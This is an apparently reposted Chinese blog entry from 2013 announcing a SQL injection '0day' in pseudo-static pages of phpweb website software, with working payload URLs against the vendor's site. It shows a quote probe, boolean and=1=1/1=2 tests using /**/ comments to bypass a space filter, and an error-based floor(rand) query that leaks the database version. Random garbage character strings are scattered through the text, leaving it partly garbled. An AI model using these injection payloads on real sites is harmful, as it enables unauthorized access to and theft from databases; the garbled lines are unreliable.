phpweb伪静态页面注入0day

admin

phpweb所有的整站程序伪静态页面都存在sql注入
! [, I4 m: z) h( I* w2 N! C9 P- c
- R: \$ j7 @9 j3 X( F主站：http://phpweb.net/
5 y9 [7 P) E, S* F" E/ ~1 H/ z; B加’检测：

0 M- f/ M5 R& \http://www.phpweb.net/down/html/?772′.html

出错
存在注入。
: A- f( t0 D9 [2 p9 P2 i8 W不能用空格，只能用/*罗
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) [, C+ }- h3 e7 s4 R. Q/ \9 q! J
; z0 F' `$ }- z' xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
爆数据库版本：
( E9 z. V4 J& Z3 B' e3 u  t
?
1
) W; l3 }% Q8 H+ k) M) qhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
更新日期: 2013-01-03 13:39:50